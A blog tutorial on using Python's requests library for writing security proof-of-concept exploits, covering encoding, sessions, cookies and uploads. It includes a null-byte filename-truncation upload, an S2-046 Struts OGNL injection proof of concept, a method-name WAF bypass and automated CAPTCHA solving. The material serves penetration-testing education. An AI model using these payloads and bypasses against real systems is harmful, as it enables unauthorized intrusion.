Notes on Using the Python requests Library (for Writing POCs/EXPs)

Latest recommended article published on 2024-08-09 23:34:20

fnmsd

Article link: https://blog.csdn.net/fnmsd/article/details/79531403

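requests is a powerful HTTP library for Python. It URL-encodes query parameters and form data automatically, and it builds on urllib3 to provide Keep-Alive and HTTP connection pooling, so much of what would otherwise be done by hand is handled for you.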

The official site lists these "beloved features":

Keep-Alive & Connection Pooling
International Domains and URLs
Sessions with Cookie Persistence
Browser-style SSL Verification
Automatic Content Decoding
Basic/Digest Authentication
Elegant Key/Value Cookies
Automatic Decompression
Unicode Response Bodies
HTTP(S) Proxy Support
Multipart File Uploads
Streaming Downloads
Connection Timeouts
Chunked Requests
.netrc Support

This article covers requests usage patterns and pitfalls that come up in day-to-day POC/EXP writing.

Basic Usage

GET Requests

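import requests
# Written once here and not repeated below
url = 'https://www.anquanke.com/'
headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36'}
# Burp's proxy address; Burp's listener is a plain HTTP proxy, so the https entry also uses an http:// proxy URL
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
parameters={'abc':'bc%"\x00d'}
r = requests.get(url, # request URL
                 params = parameters, # URL query parameters
                 headers = headers, # request headers
                 proxies = proxies, # proxy server; leave out if not needed
                 verify = False # With Burp as the proxy, certificate verification fails and raises an exception; False skips verification and carries on. The same works for HTTPS sites with broken certificates.
                )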

The values passed in params are URL-encoded automatically when the request is sent:

GET /?abc=bc%25%22%00d HTTP/1.1
Host: www.anquanke.com
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36
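
The encoding can also be checked without sending anything. The following is a minimal sketch, assuming a reasonably recent requests release: it builds the same GET request as a Request object, prepares it, and prints the URL that requests would put on the wire.

```python
import requests

# Build the request without sending it, then inspect the URL requests produced.
req = requests.Request('GET', 'https://www.anquanke.com/',
                       params={'abc': 'bc%"\x00d'})
prepped = req.prepare()
print(prepped.url)
```

Preparing a request offline like this is a convenient way to confirm how a payload will be encoded before pointing a POC at a real target.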

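If the same parameter name needs to appear more than once (for HTTP parameter pollution, for example), set the value for that name in the params dict to a list: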

parameters = {'aaa':['aaa','bbbb']}

Try this one yourself.
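
For reference, a small offline sketch of the list form. The host example.com is a placeholder and not part of the original article; the request is only prepared, never sent.

```python
import requests

# A list value makes the same parameter name appear once per element.
params = {'aaa': ['aaa', 'bbbb']}
prepped = requests.Request('GET', 'http://example.com/', params=params).prepare()
print(prepped.url)
```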

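Parameters can also be written directly into the URL, but then special characters such as % and & are not URL-encoded, so take care.

The URL that was actually requested can be read from r.url:

url = 'https://www.anquanke.com/?abc=bc\x00%"d&abcd=123'
r = requests.get(url)
print(r.url)
#https://www.anquanke.com/?abc=bc%00%%22d&abcd=123

As the output shows, the % in the URL was not encoded.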

POST Requests

import requests
url = 'https://www.anquanke.com/'
postdata={'a':'a\x00aa"a','b':'bb%bb'}
r = requests.post(url,data=postdata)

The request that is sent:

POST / HTTP/1.1
Host: www.anquanke.com
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 22
Content-Type: application/x-www-form-urlencoded

a=a%00aa%22a&b=bb%25bb

The data parameter also accepts a prebuilt string. requests submits that string as-is without encoding it, which is useful when URL encoding must be avoided.
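
The difference between the two forms of data can be seen side by side. This is a minimal sketch that only prepares the requests; the raw string payload is made up for illustration.

```python
import requests

url = 'https://www.anquanke.com/'

# A dict is form-encoded by requests.
form = requests.Request('POST', url, data={'a': 'a\x00aa"a', 'b': 'bb%bb'}).prepare()
# A string is used as the request body unchanged.
raw = requests.Request('POST', url, data='a=a"a&b=bb%bb').prepare()

print(form.body)
print(raw.body)
print(raw.headers.get('Content-Type'))  # None: no Content-Type is added for a string body
```

Since no Content-Type is added for a string body, a POC that sends a hand-built form string usually has to set that header itself.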

Besides GET and POST, requests also supports PUT, DELETE, HEAD, OPTIONS and other methods out of the box; try them yourself.

Common Response Attributes

import requests
r = requests.get('https://api.github.com/events')
r.content # raw bytes; suited to non-text responses (binary file downloads, encrypted payloads, and so on)
#b'[{"repository":{"open_issues":0,"url":"https://github.com/...

r.text # content decoded to Unicode text; suited to text data (HTML, TXT, and so on)
#u'[{"repository":{"open_issues":0,"url":"https://github.com/...

r.encoding # the encoding r.text decodes with. requests takes it from the response headers; when it is None, r.text falls back to detection with chardet. Set it by hand when it is wrong.
#'utf-8'

r.json() # parses the body as JSON and returns a dict or list; for JSON responses
#[{u'repository': {u'open_issues': 0, u'url': 'https://github.com/...

r.headers # response headers
#{'X-XSS-Protection': '1; mode=block', 'Content-Security-Policy': "default-src 'none'"...

r.status_code # status code
#200

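Using Sessions in requests

To access pages that require a login, use the Session feature of requests. A Session automatically keeps track of Set-Cookie for us.

The example below uses Acunetix's online demo system. It is best to look at the site in a browser before experimenting with the script.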

http://testphp.vulnweb.com/cart.php

import requests
s = requests.session() # create the session object
r = s.get('http://testphp.vulnweb.com/cart.php') # fetch the cart
print(r.text)
# The result contains <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p>, so a login is required
r = s.post('http://testphp.vulnweb.com/userinfo.php',data={'uname':'test','pass':'test'}) # log in
r = s.get('http://testphp.vulnweb.com/cart.php') # fetch the cart again
print(r.text)
# The source now contains <a href='logout.php'>Logout test</a> and Total: $0
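
What the Session does with cookies can be illustrated offline. In the sketch below, the cookie value abc123 is a made-up stand-in for whatever a real login response would set; the request is prepared through the session but not sent.

```python
import requests

s = requests.Session()
# Stand-in for a cookie that a login response would set via Set-Cookie.
s.cookies.set('PHPSESSID', 'abc123')

req = requests.Request('GET', 'http://testphp.vulnweb.com/cart.php')
prepped = s.prepare_request(req)  # merges the session state into the request
print(prepped.headers.get('Cookie'))
```

Every request made through the same session object picks up the cookies stored in s.cookies in this way, which is why the second cart request above is treated as logged in.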

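Many login flows now involve a CAPTCHA. It can be recognized with the Alibaba Cloud CAPTCHA recognition API before logging in, and the CAPTCHA image must be fetched through the same session. Take the Anquanke login as an example: the site separates front end and back end completely, so calling the login API is enough.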

import base64
import requests
import json
s = requests.session() # create the session
username='testas34' # a throwaway account registered for this test
password='test12345'
appcode='xxxxxxxxxxxxxxxxxxxxxxx' # API key for CAPTCHA recognition; it can be purchased on the Alibaba Cloud marketplace: https://market.aliyun.com/products/57126001/cmapi014396.html

headers = {'Connection': 'close',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
 } # pretend to be Chrome
headers['Referer']='https://www.anquanke.com/login'
img_captcha = s.get('https://api.anquanke.com/data/v1/util/captcha?r=0.27755197669540665',headers=headers) # fetch the CAPTCHA image; change the random number if needed
image_r = requests.post('http://jisuyzmsb.market.alicloudapi.com/captcha/recognize',
                        headers={'Authorization':'APPCODE '+appcode,'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'},
                        data={'type':'en5','pic':base64.b64encode(img_captcha.content)} # base64.b64encode replaces the Python 2 only .encode('base64')
                       ) # recognize the CAPTCHA
print(image_r.json()) # recognition result
captcha = image_r.json()['result']['code']
headers['Content-Type']='application/json;charset=UTF-8' # **the key step: Content-Type must be set correctly
headers['Origin']='https://www.anquanke.com'
login_data={'username':username,'password':password,'captcha':captcha}
r = s.post('https://api.anquanke.com/data/v1/user/login',headers=headers,data=json.dumps(login_data)) # log in
print(r.json())
r = s.get('https://api.anquanke.com/data/v1/user/status',headers=headers) # check the login status
print(r.json())
#{u'isLogin': True, u'user': {u'username': u'testas34', u'nonce': u'929babda60', u'description': u'\u8fd9\u4e2a\u4eba\u592a\u61d2\u4e86\uff0c\u7b7e\u540d\u90fd\u61d2\u5f97\u5199\u4e00\u4e2a', u'email': u'test123@test.com', u'avatar': u'https://p4.ssl.qhimg.com/t010857340ce46bb672.jpg', u'nickname': u'testas34', u'id': 131547}} the post-login status information was retrieved
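
As an alternative to calling json.dumps and setting Content-Type by hand, requests also accepts a json= argument. The sketch below only prepares the request; the captcha value 'abcd' is a placeholder. Note that the header it produces is application/json without the charset suffix, and whether the Anquanke API accepts that form has not been verified here.

```python
import json
import requests

login_data = {'username': 'testas34', 'password': 'test12345', 'captcha': 'abcd'}
req = requests.Request('POST', 'https://api.anquanke.com/data/v1/user/login',
                       json=login_data)  # serializes the dict and sets Content-Type
prepped = req.prepare()
print(prepped.headers['Content-Type'])
print(prepped.body)
```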

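A requests session object can hold some settings in one place, as follows:

s.headers={'Content-Type':'application/json;charset=UTF-8'} # request headers (this assignment replaces the session's default headers)
s.proxies={'https':'http://127.0.0.1:8080'} # proxy settings
s.verify=False # SSL certificate verification

This simply assigns to the session object the arguments that would normally be passed to each request function.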
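
A short sketch of how session-level headers combine with per-request headers. It uses s.headers.update instead of plain assignment so that the default headers, such as User-Agent, are kept; the Referer value is only an example.

```python
import requests

s = requests.Session()
s.headers.update({'Content-Type': 'application/json;charset=UTF-8'})  # keeps the defaults
s.proxies = {'https': 'http://127.0.0.1:8080'}  # applied when the request is sent
s.verify = False                                # applied when the request is sent

req = requests.Request('GET', 'https://www.anquanke.com/',
                       headers={'Referer': 'https://www.anquanke.com/login'})
prepped = s.prepare_request(req)
for name, value in prepped.headers.items():
    print('%s: %s' % (name, value))
```

Headers given on the individual request are merged on top of the session headers, so a single request can still override a session-wide value.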

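Stream Mode: Reading in Chunks (Large File Downloads)

Downloading a file with requests is normally simple:

import requests
r = requests.get('https://p0.ssl.qhimg.com/t01dcf171a151ec5398.png')
f = open('logo.png','wb') # note the wb mode
f.write(r.content) # use content for non-text files
f.close()

When the file is large enough that memory could run out, stream mode is recommended: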

import requests
r = requests.get('http://zt.bdinfo.net/speedtest/wo3G.rar', stream=True)
f = open("wo3G.rar", "wb") # save under the name of the file being downloaded
for chunk in r.iter_content(chunk_size=512):
    if chunk:
        f.write(chunk)
f.close()
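
The same idea can be wrapped in a reusable helper. This is a sketch rather than a definitive implementation: the function names save_chunks and download, the chunk size and the timeout are all choices made here, not part of the original article.

```python
import requests

def save_chunks(chunks, path):
    """Write an iterable of byte chunks to path; return the number of bytes written."""
    written = 0
    with open(path, 'wb') as f:
        for chunk in chunks:
            if chunk:  # skip empty chunks
                f.write(chunk)
                written += len(chunk)
    return written

def download(url, path, chunk_size=8192, timeout=10):
    """Stream url to path without holding the whole body in memory."""
    with requests.get(url, stream=True, timeout=timeout) as r:
        r.raise_for_status()  # fail early on 4xx/5xx instead of saving an error page
        return save_chunks(r.iter_content(chunk_size=chunk_size), path)
```

Using the response as a context manager releases the connection even if writing fails partway through, for example download('http://zt.bdinfo.net/speedtest/wo3G.rar', 'wo3G.rar').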

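File Upload (Multipart-Encoded POST Requests)

requests makes it easy to generate the multipart request used for file uploads, with no need to build the request body by hand.

Taking a truncation-upload request as an example:

import requests
postdata = {'test':'test1'} # ordinary form fields
files = {
    'upload':('phpinfo.php\x00.png',open('phpinfo.php','rb'),'image/png')
} # file fields keyed by field name; the tuple holds the filename, the file content and the file's Content-Type, which may be omitted
r = requests.post('http://www.anquanke.com',files=files,data=postdata)

The generated request: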

POST / HTTP/1.1
Host: www.anquanke.com
Connection: close
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 285
Content-Type: multipart/form-data; boundary=bc335c29888040ea9a820d679d67eee8

--bc335c29888040ea9a820d679d67eee8
Content-Disposition: form-data; name="test"

test1
--bc335c29888040ea9a820d679d67eee8
Content-Disposition: form-data; name="upload"; filename="phpinfo.php口.png"
Content-Type: image/png

<?php phpinfo();
--bc335c29888040ea9a820d679d67eee8--

The 口 marks the position of \x00. The file to upload must be opened in rb mode so that the data is not corrupted by text-mode reading.
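
The multipart body can be inspected without a target or a file on disk. The sketch below passes the file content as bytes in place of an open file and uses a plain filename; it prepares the request and prints what requests generated.

```python
import requests

# File content given inline as bytes instead of an open file object.
files = {'upload': ('phpinfo.php', b'<?php phpinfo();', 'image/png')}
req = requests.Request('POST', 'http://www.anquanke.com',
                       files=files, data={'test': 'test1'})
prepped = req.prepare()

print(prepped.headers['Content-Type'])   # multipart/form-data with a random boundary
print(prepped.body.decode('latin-1'))    # the generated multipart body
```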

Working with Cookies

Many POCs need to manipulate cookies. The cookies in a response can be accessed like a dict:

import requests
r = requests.get('https://api.anquanke.com/data/v1/user/status')
print(r.cookies) # printed as a RequestsCookieJar
#<RequestsCookieJar[<Cookie PHPSESSID=trvut7m5ovga5il8fsp6ahn9s2 for api.anquanke.com/>]>
print(dict(r.cookies)) # converted to a dict
#{'PHPSESSID': 'trvut7m5ovga5il8fsp6ahn9s2'}
print(r.cookies['PHPSESSID'])
#trvut7m5ovga5il8fsp6ahn9s2

A dict can be passed directly as the cookies of a request:

import requests
Cookies={'wakaka':'aaaaa','bbbb':'aaaa'}
r = requests.get('https://api.anquanke.com/data/v1/user/status',cookies=Cookies)

The captured request:

GET /data/v1/user/status HTTP/1.1
Host: api.anquanke.com
Connection: close
Accept: */*
User-Agent: python-requests/2.18.4
Cookie: wakaka=aaaaa; bbbb=aaaa

As shown, the cookies were sent.

PS: Cookies can also be passed as a request header, but this approach is not recommended.
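
The Cookie header that requests builds from a dict can be checked offline as well. A minimal sketch that prepares the request shown above without sending it:

```python
import requests

cookies = {'wakaka': 'aaaaa', 'bbbb': 'aaaa'}
req = requests.Request('GET', 'https://api.anquanke.com/data/v1/user/status',
                       cookies=cookies)
prepped = req.prepare()
cookie_header = prepped.headers['Cookie']
print(cookie_header)
```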

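Custom Content-Length and Request Method Names

The Content-Length header is computed automatically when data is supplied and cannot be set directly through the request functions. One way of exploiting S2-046, however, requires a Content-Length of 2 GB or more.

Likewise, setting the method name to XXXX, or putting a space in front of the method (such as " POST") to bypass a WAF, is not possible through the get/post helper functions. In these cases, build the request with the requests Request object. Taking an S2-046 POC as an example:

import requests
s = requests.session()
f={'upload':("%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('justatest','23333')}","233333",'text/plain')}
req = requests.Request(' XXXX',"http://www.anquanke.com",files=f) # set the request method to " XXXX"; the arguments are the same as when calling get/post directly
prepped = req.prepare()
prepped.headers['Content-Length']='10000000' # overwrite the value that was already computed
s.send(prepped) # send the prepared request

Because the method starts with a space, Burp Suite strips the leading space, \n and similar characters when it intercepts the request, so verify this with a Wireshark capture instead.

The captured request: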

 XXXX / HTTP/1.1
Host: www.anquanke.com
Accept-Encoding: identity
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=a5ff424949484aa18c82d6e5b2cf4dfa

--a5ff424949484aa18c82d6e5b2cf4dfa
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('justatest','23333')}"
Content-Type: text/plain

233333
--a5ff424949484aa18c82d6e5b2cf4dfa--
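
Before reaching for Wireshark, the prepared request can be given a quick sanity check in Python. The helper dump_request below is hypothetical, written for this note; it only approximates the request line and headers, because headers such as Host are added later by the underlying HTTP layer. The body '233333' is a simplified stand-in for the multipart payload.

```python
import requests

def dump_request(prepped):
    """Render a PreparedRequest as approximate request-line and header text."""
    lines = ['%s %s HTTP/1.1' % (prepped.method, prepped.path_url)]
    lines += ['%s: %s' % (name, value) for name, value in prepped.headers.items()]
    return '\r\n'.join(lines)

req = requests.Request(' XXXX', 'http://www.anquanke.com', data='233333')
prepped = req.prepare()
prepped.headers['Content-Length'] = '10000000'  # overwrite the computed value
print(dump_request(prepped))
```

This confirms that the leading space and the overridden Content-Length survive preparation; what actually goes on the wire should still be confirmed with a packet capture.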

Some Tips

With verify=False, an InsecureRequestWarning is printed for unverified HTTPS requests, which gets annoying. The following code turns off these SSL warnings.
```
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
```
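requests follows 30x redirects automatically. To capture the 30x response itself, pass allow_redirects=False to the request function.

Remember to give request functions a timeout argument as a matter of habit; the unit is seconds.

r=requests.get('http://www.anquanke.com',timeout=3,allow_redirects=False)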
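
These tips fit together naturally in a small wrapper. The function probe below is a hypothetical helper, not something from requests itself: it disables the warning, sets a timeout, does not follow redirects, and returns None when the request fails for any reason.

```python
import requests
import urllib3

# Silence the warning that verify=False would otherwise print.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def probe(url, timeout=3):
    """Return (status_code, Location header) for url, or None if the request fails."""
    try:
        r = requests.get(url, timeout=timeout, allow_redirects=False, verify=False)
    except requests.exceptions.RequestException:
        # Covers timeouts, connection errors, malformed URLs and similar failures.
        return None
    return r.status_code, r.headers.get('Location')
```

Catching requests.exceptions.RequestException keeps a scan over many targets from aborting on the first host that is down or slow.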

The official site carries a rather humorous line:
Requests is the only Non-GMO HTTP library for Python, safe for human consumption.
